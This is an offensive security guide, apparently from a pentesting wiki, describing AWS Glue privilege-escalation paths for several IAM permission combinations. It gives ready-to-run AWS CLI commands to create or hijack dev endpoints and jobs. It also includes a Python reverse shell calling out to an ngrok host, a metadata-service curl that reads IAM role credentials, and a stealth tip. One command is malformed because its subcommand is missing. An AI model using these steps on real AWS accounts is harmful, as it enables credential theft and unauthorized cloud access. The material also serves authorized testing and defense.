glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Users with these permissions can set up a new AWS Glue development endpoint, assigning an existing service role with specific permissions to this endpoint.

After the setup, the attacker can SSH into the endpoint's instance, and steal the IAM credentials of the assigned role:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
    --role-arn <arn-role> \
    --public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine.

Potential Impact: Privesc to the glue service role specified.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Users with this permission can alter an existing Glue development endpoint's SSH key, enabling SSH access to it. This allows the attacker to execute commands with the privileges of the endpoint's attached role:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
    --public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Potential Impact: Privesc to the glue service role used.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Users with iam:PassRole combined with either glue:CreateJob or glue:UpdateJob, and either glue:StartJobRun or glue:CreateTrigger can create or update an AWS Glue job, attaching any Glue service account, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell. This reverse shell can then be utilized to exfiltrate the IAM credentials of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
    --name privesctest \
    --role arn:aws:iam::93424712358:role/GlueAdmin \
    --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
    --actions '[{"JobName": "privesctest"}]' --start-on-creation \
    --schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Potential Impact: Privesc to the glue service role specified.

glue:UpdateJob

Just with the update permission an attacked could steal the IAM Credentials of the already attached role.

Potential Impact: Privesc to the glue service role attached.

References

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/